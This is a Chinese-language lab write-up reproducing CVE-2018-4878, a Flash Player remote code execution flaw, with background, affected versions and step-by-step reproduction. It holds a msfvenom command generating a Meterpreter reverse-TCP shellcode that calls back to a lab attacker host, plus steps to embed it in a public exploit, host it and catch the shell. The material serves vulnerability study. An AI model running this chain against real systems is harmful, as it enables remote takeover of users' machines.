(CVE-2018-4878)Adobe_Flash_Player_远程代码执行漏洞

# (CVE-2018-4878)Adobe Flash Player 远程代码执行漏洞

============

一、漏洞简介
————

2018年1月31日,韩国CERT发布公告称发现Flash
0day漏洞的野外利用,攻击者执行针对性的攻击;2月1日Adobe发布安全公告,确认Adobe
Flash Player 28.0.0.137
及早期版本存在远程代码执行漏洞(CVE-2018-4878);2月2日,Cisco
Talos团队发布了事件涉及攻击样本的简要分析;2月7日,Adobe发布了CVE-2018-4878漏洞的安全补丁。

二、漏洞影响
————

Adobe Flash Player \<= 28.0.0.137 三、复现过程 ------------ - 1.环境 kail: `192.168.184.128` win7sp1: `192.168.184.131` exp: `CVE-2018-4878-master.zip ` flash: `AdobeFlashPlayer28.0.0.161正式版.zip` - 2.利用msfvenom生成对应的shellcode代码 ```{=html}
“`
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.184.128 lport=4444 -f python>shellcode.txt

![1.png](/static/qingy/(CVE-2018-4878)Adobe_Flash_Player_远程代码执行漏洞/img/rId24.png)

– 3.进入 CVE-2018-4878-master
目录,编辑`CVE-2018-4878.py`文件,将msfvenom生成的代码覆盖掉原来的代码

![2.png](/static/qingy/(CVE-2018-4878)Adobe_Flash_Player_远程代码执行漏洞/img/rId25.png)

– 4.修改 swf 文件及 html 文件位置

![3.png](/static/qingy/(CVE-2018-4878)Adobe_Flash_Player_远程代码执行漏洞/img/rId26.png)

– 5.Python 执行 CVE-2018-4878-master.py 代码,会生成两个文件,一个 swf
文件,一个 html 文件

![4.png](/static/qingy/(CVE-2018-4878)Adobe_Flash_Player_远程代码执行漏洞/img/rId27.png)

– 6.把生成的两个文件放到apache web目录下

![5.png](/static/qingy/(CVE-2018-4878)Adobe_Flash_Player_远程代码执行漏洞/img/rId28.png)

– 7.通过msf开启反弹sehll监听

![6.png](/static/qingy/(CVE-2018-4878)Adobe_Flash_Player_远程代码执行漏洞/img/rId29.png)

– 8.靶机上win7安装存在漏洞的adobe flash player 28.0.0.126

![7.png](/static/qingy/(CVE-2018-4878)Adobe_Flash_Player_远程代码执行漏洞/img/rId30.png)

– 9.通过win7自带的ie浏览器进行访问`192.168.184.128/index2.html`

![8.png](/static/qingy/(CVE-2018-4878)Adobe_Flash_Player_远程代码执行漏洞/img/rId31.png)

– 10.Kail上成功获取到meterpreter shell

![9.png](/static/qingy/(CVE-2018-4878)Adobe_Flash_Player_远程代码执行漏洞/img/rId32.png)

![10.png](/static/qingy/(CVE-2018-4878)Adobe_Flash_Player_远程代码执行漏洞/img/rId33.png)

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容